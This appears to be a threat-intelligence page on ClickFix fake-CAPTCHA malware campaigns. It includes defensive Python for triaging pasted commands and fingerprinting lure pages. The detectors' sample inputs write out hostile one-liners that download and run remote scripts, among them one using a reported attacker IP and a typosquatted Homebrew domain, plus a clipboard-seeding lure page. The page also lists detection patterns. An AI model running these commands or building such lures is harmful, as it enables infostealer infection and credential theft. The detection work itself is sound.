ClickFix Social-Engineering Technique Using Fake CAPTCHA to Trigger Manual Command Execution
A ClickFix-style malware campaign has been observed using fake CAPTCHA pages on compromised websites to trick users into manually executing malicious commands, gaining initial access while sidestepping controls that focus on downloaded files. In the reported activity, victims are prompted to copy a PowerShell command and run it themselves; the script then downloads additional stages from attacker infrastructure (including 91.92.240.219), confirms that a real user is present by checking clipboard activity, and proceeds through a multi-stage infection chain. The final payload is an information stealer targeting data from more than 25 web browsers, cryptocurrency wallets (for example MetaMask) and enterprise VPN configurations, and it checks for virtualized environments and security tooling before exfiltrating. Because the browser never downloads a file, detection has to rest on host telemetry (the interpreter spawned from the user's interactive session and its outbound fetch) rather than on download scanning.
Separately reported activity in the same window includes UnsolicitedBooker targeting Central Asian telecoms with phishing-delivered backdoors (LuciDoor and MarsSnake), and APT28's Operation MacroMaze, which uses weaponized Office documents whose INCLUDEPICTURE fields point at webhook[.]site URLs, both as an open-tracking mechanism and to support follow-on macro-based payload delivery. A video-style weekly briefing also mentions a ClickFix variant whose initial command calls nslookup and parses the DNS response to obtain the content it then executes; that briefing is a multi-topic roundup rather than a primary source on the fake-CAPTCHA infostealer campaign. A malware newsletter roundup is likewise a link collection and adds no specific, corroborating details about the ClickFix CAPTCHA infostealer operation.
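The command the victim is told to paste is the one artifact every ClickFix variant shares, so a defender can triage it statically before it runs, whether it arrives from a clipboard monitor, the Win+R history, or a process-creation event. The following Python is an added example written for this page, not code from any of the reports it summarises; it generalises beyond the PowerShell one-liner described above to the macOS `bash -c "$(curl ...)"` installer form and the `msiexec` and `SyncAppvPublishingServer.vbs` proxies discussed in the related stories below. The allowlisted hosts, brand tokens, edit-distance thresholds and sample commands are assumptions constructed for the example; the only indicator taken from the page is the 91.92.240.219 address.

```python
"""Static triage of copy/paste commands seen in ClickFix lures.

Added example, not code from the reports summarised on this page. Input is the
raw command a user was told to paste; output is a verdict plus the evidence
behind it. Allowlist, brand tokens and thresholds are assumptions to tune.
"""
import re
from urllib.parse import urlparse

# Hosts a legitimate fetch-and-execute installer is expected to use (assumption).
EXPECTED_HOSTS = {"raw.githubusercontent.com", "github.com"}
# Brand words a typosquatted host imitates, matched per DNS label (assumption).
BRAND_TOKENS = {"homebrew", "github", "githubusercontent"}

FETCH = [  # primitives that pull content from the network
    r"\biwr\b", r"\birm\b", r"invoke-webrequest", r"invoke-restmethod",
    r"downloadstring", r"downloadfile", r"\bcurl\b", r"\bwget\b",
    r"\bmshta(?:\.exe)?\s+https?://", r"msiexec(?:\.exe)?\b.*?/i\s+https?://",
]
EXEC = [  # hand fetched content to an interpreter or installer
    r"\biex\b", r"invoke-expression", r"\|\s*powershell", r"\|\s*(?:ba)?sh\b",
    r"\$\(\s*curl", r"\bbash\s+-c\b", r"\bmsiexec\b", r"\bmshta\b",
    r"syncappvpublishingserver\.vbs",
]
EVASION = [  # hidden windows, policy bypass, silent installs, LOLBin proxying
    r"-w(?:indowstyle)?\s+h(?:idden)?\b", r"-nop\b", r"-noprofile\b",
    r"-ep\s+bypass", r"-executionpolicy\s+bypass", r"-e(?:nc|ncodedcommand)\b",
    r"syncappvpublishingserver\.vbs", r"\bmsiexec\b.*\s/q(?:n|b|uiet)?\b",
]
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def hits(patterns, cmd):
    """Return the patterns from `patterns` that occur in `cmd` (case-insensitive)."""
    return [p for p in patterns if re.search(p, cmd, re.I)]


def levenshtein(a, b):
    """Plain edit distance; small inputs, so a one-row DP is enough."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(host):
    """True if a DNS label is a near-miss of a brand token (e.g. 'homabrews')."""
    if host in EXPECTED_HOSTS:
        return False
    for label in host.lower().split("."):
        tol = 2 if len(label) >= 8 else 1  # stricter for short labels: gitlab != github
        for brand in BRAND_TOKENS:
            if label != brand and levenshtein(label, brand) <= tol:
                return True
    return False


def triage(cmd):
    """Classify one pasted command as allow / review / block with evidence."""
    hosts = [urlparse(u).hostname or "" for u in URL_RE.findall(cmd)]
    fetch, execute, evasion = hits(FETCH, cmd), hits(EXEC, cmd), hits(EVASION, cmd)
    fetch_exec = bool(fetch and execute)
    ip_hosts = [h for h in hosts if IPV4_RE.fullmatch(h)]
    lookalikes = [h for h in hosts if lookalike(h)]
    unexpected = [h for h in hosts if h not in EXPECTED_HOSTS]
    if lookalikes or (fetch_exec and (evasion or ip_hosts)):
        verdict = "block"
    elif fetch_exec or (fetch and unexpected):
        verdict = "review"  # legitimate installers land here; the host decides
    else:
        verdict = "allow"
    return {"verdict": verdict, "fetch_exec": fetch_exec, "evasion": evasion,
            "hosts": hosts, "ip_hosts": ip_hosts, "lookalike_hosts": lookalikes}


SAMPLES = {  # constructed for this example; only the IP is an indicator from the page
    "fake_captcha_ps": 'powershell -w hidden -nop -c "iwr http://91.92.240.219/x.ps1 | iex"',
    "curl_pipe_ps": "cmd /c curl -s https://example.invalid/a | powershell",
    "brew_typosquat": '/bin/bash -c "$(curl -fsSL https://raw.homabrews.org/Homebrew/install/HEAD/install.sh)"',
    "brew_legit": '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "silent_msi": "msiexec /i https://example.invalid/update.msi /q",
    "appv_proxy": r'wscript C:\Windows\System32\SyncAppvPublishingServer.vbs "n;iwr http://example.invalid/s | iex"',
    "benign": "powershell -c Get-Process",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        r = triage(cmd)
        print(f"{name:16} {r['verdict']:7} hosts={r['hosts']} lookalike={r['lookalike_hosts']}")
```

The legitimate Homebrew installer is itself a fetch-and-execute one-liner, so the verdict deliberately stops at "review" for allowlisted hosts and only escalates to "block" on a lookalike label, a bare IP, or a hide-the-window / silent-install switch; the allowlist is where local policy belongs.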
Related Stories

ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
3 weeks ago
ClickFix Social-Engineering Campaigns Using Fake CAPTCHA and Fake Installer Pages
Security researchers reported multiple **ClickFix** campaigns that compromise endpoints by tricking users into manually executing attacker-provided commands rather than exploiting a software vulnerability. CERT Polska documented an incident response at a large Polish organization where a **fake CAPTCHA** prompt led a user to run a malicious snippet via *Win+R*, resulting in malware execution and suspected **DLL side-loading** from `%APPDATA%\Intel` (legitimate `igfxSDK.exe`/`version.dll` alongside a suspicious `wtsapi32.dll`). Investigators also identified additional suspicious DLLs in the user's local AppData and recovered an execution trail consistent with a one-liner that fetched remote content and piped it into PowerShell (e.g., `cmd /c curl ... | powershell`). Separately, threat-hunting research described a macOS-focused ClickFix operation using **typosquatted Homebrew** lookalike sites to present a "copy/paste" install command that runs in Terminal. The first-stage script repeatedly prompted for a password and validated it using `dscl authonly` to harvest working credentials before deploying a second-stage infostealer dubbed **Cuckoo Stealer**, which was reported to establish **LaunchAgent** persistence, remove quarantine attributes, and communicate over encrypted HTTPS C2 while targeting browser credentials/session tokens, Keychain data, notes/messaging artifacts, VPN/FTP configs, and cryptocurrency wallets. Both reports highlight ClickFix as an increasingly common, opportunistic initial-access technique that scales by abusing trusted user workflows on Windows and macOS.
4 weeks ago
Fake CAPTCHA (ClickFix) Social Engineering Used for Fileless Malware Delivery
Security researchers reported an active malware distribution technique that abuses **bogus CAPTCHA** pages to trick users into executing attacker-supplied commands on Windows. In the **ClearFake** campaign analyzed by Expel, victims land on a compromised site and are instructed to press `Win + R`, then paste and run a clipboard-seeded command—an approach commonly referred to as **ClickFix**—which results in malicious **PowerShell** execution. The campaign emphasizes *living-off-the-land* tradecraft and evasion, including **proxy execution** by abusing the trusted Windows script `C:\Windows\System32\SyncAppvPublishingServer.vbs` to launch PowerShell in hidden mode and reduce the chance of AV detection. Separate measurement and telemetry on the same broader tactic found large-scale infrastructure supporting fake CAPTCHA lures: a Censys analysis identified **9,494** breached websites hosting counterfeit verification pages, with ~**70%** appearing nearly identical. The most common infection mechanisms involved **clipboard manipulation** leading to **VBScript** and **PowerShell** execution (with significant counts of each observed), alongside other delivery paths such as `MSIEXEC`-based installation of malicious Windows Installer packages. Researchers also observed use of the **Matrix** push command-and-control framework to support **fileless** deployment, noting that these intrusions can leave no traditional executable artifacts and may evade signature-based detection.
1 month ago
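The Censys measurement above (thousands of breached sites serving near-identical verification pages that seed the clipboard) suggests triaging the lure page itself, not only the endpoint. The following Python is an added example, not code from Censys, Expel or any other source on this page: it extracts the command a page hands to `navigator.clipboard.writeText`, looks for the paste-and-run instructions shown around it, and hashes the page template with string literals, digits and whitespace removed so that copies differing only in the seeded command or a "verification ID" cluster together. The two fake pages and the benign reCAPTCHA form are constructed samples, and the instruction phrases are assumed wording.

```python
"""Fingerprint a web page for ClickFix-style fake-CAPTCHA lures.

Added example, not code from any report on this page. Input is raw HTML;
output says whether the page seeds the clipboard, what command it seeds,
which paste-and-run instructions it shows, and a template fingerprint that is
stable across copies differing only in string literals, digits or whitespace.
"""
import hashlib
import html
import re

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
TAG_RE = re.compile(r"<[^>]+>")
# writeText("literal") or writeText(identifier); execCommand('copy') is the legacy form.
WRITE_LITERAL_RE = re.compile(r"writeText\(\s*(['\"`])(.*?)\1\s*\)", re.S)
WRITE_IDENT_RE = re.compile(r"writeText\(\s*([A-Za-z_$][\w$]*)\s*\)")
EXEC_COPY_RE = re.compile(r"execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
# Phrases that walk the victim through Win+R / paste / Enter (assumed wording).
INSTRUCTION_RES = [
    r"win(?:dows)?\s*(?:key)?\s*\+\s*r\b",
    r"ctrl\s*\+\s*v\b",
    r"press\s+enter",
    r"not a robot",
    r"verify (?:you are|that you are) human",
]


def visible_text(doc):
    """Text a user sees: scripts and tags removed, entities decoded, lowercased."""
    return html.unescape(TAG_RE.sub(" ", SCRIPT_RE.sub(" ", doc))).lower()


def seeded_payload(scripts):
    """Return the string handed to navigator.clipboard.writeText, if resolvable."""
    m = WRITE_LITERAL_RE.search(scripts)
    if m:
        return m.group(2)
    m = WRITE_IDENT_RE.search(scripts)
    if m:  # follow `ident = "..."` one hop
        assign = re.search(r"\b" + re.escape(m.group(1)) + r"\s*=\s*(['\"`])(.*?)\1",
                           scripts, re.S)
        if assign:
            return assign.group(2)
    return None


def fingerprint(doc):
    """Template hash: quoted literals, digits and whitespace removed before hashing."""
    scrubbed = re.sub(r"(['\"`])(?:(?!\1).)*\1", '""', doc, flags=re.S)
    scrubbed = re.sub(r"\s+|\d+", "", scrubbed)
    return hashlib.sha256(scrubbed.encode()).hexdigest()[:16]


def analyze(doc):
    """Classify one HTML document; a lure needs a clipboard seed plus instructions."""
    scripts = "\n".join(SCRIPT_RE.findall(doc))
    clipboard_write = bool(WRITE_LITERAL_RE.search(scripts) or WRITE_IDENT_RE.search(scripts)
                           or EXEC_COPY_RE.search(scripts))
    payload = seeded_payload(scripts)
    text = visible_text(doc)
    instructions = [p for p in INSTRUCTION_RES if re.search(p, text)]
    lure = clipboard_write and payload is not None and len(instructions) >= 2
    return {"verdict": "fake-captcha-lure" if lure else "clean",
            "clipboard_write": clipboard_write, "payload": payload,
            "instructions": instructions, "fingerprint": fingerprint(doc)}


# Constructed samples for this example; example.invalid is a placeholder host.
FAKE_A = """<html><body>
<div class="box"><p>Verify you are human</p>
<ol><li>Press Windows Key + R</li><li>Press CTRL + V</li><li>Press Enter</li></ol></div>
<script>
const cmd = 'powershell -w hidden -c "iwr http://example.invalid/a | iex" # Verification ID: 7491';
document.querySelector('.box').addEventListener('click', () => navigator.clipboard.writeText(cmd));
</script></body></html>"""
# Same template on a second site: different command path, ID and indentation.
FAKE_B = (FAKE_A.replace("http://example.invalid/a", "https://example.invalid/update/b")
          .replace("7491", "3321").replace("\n", "\n  "))
BENIGN = """<html><body><form action="/submit" method="post">
<div class="g-recaptcha" data-sitekey="site-key"></div>
<script src="https://www.google.com/recaptcha/api.js" async defer></script>
<button type="submit">Submit</button></form></body></html>"""

if __name__ == "__main__":
    for name, doc in (("fake_a", FAKE_A), ("fake_b", FAKE_B), ("benign", BENIGN)):
        r = analyze(doc)
        print(f"{name:7} {r['verdict']:18} fp={r['fingerprint']} payload={r['payload']!r}")
```

In practice the input is the HTML captured by a proxy, crawler or URL sandbox; the fingerprint is what lets a hunt team collapse thousands of compromised sites into a handful of kit templates, while the extracted payload is what gets handed to endpoint command triage.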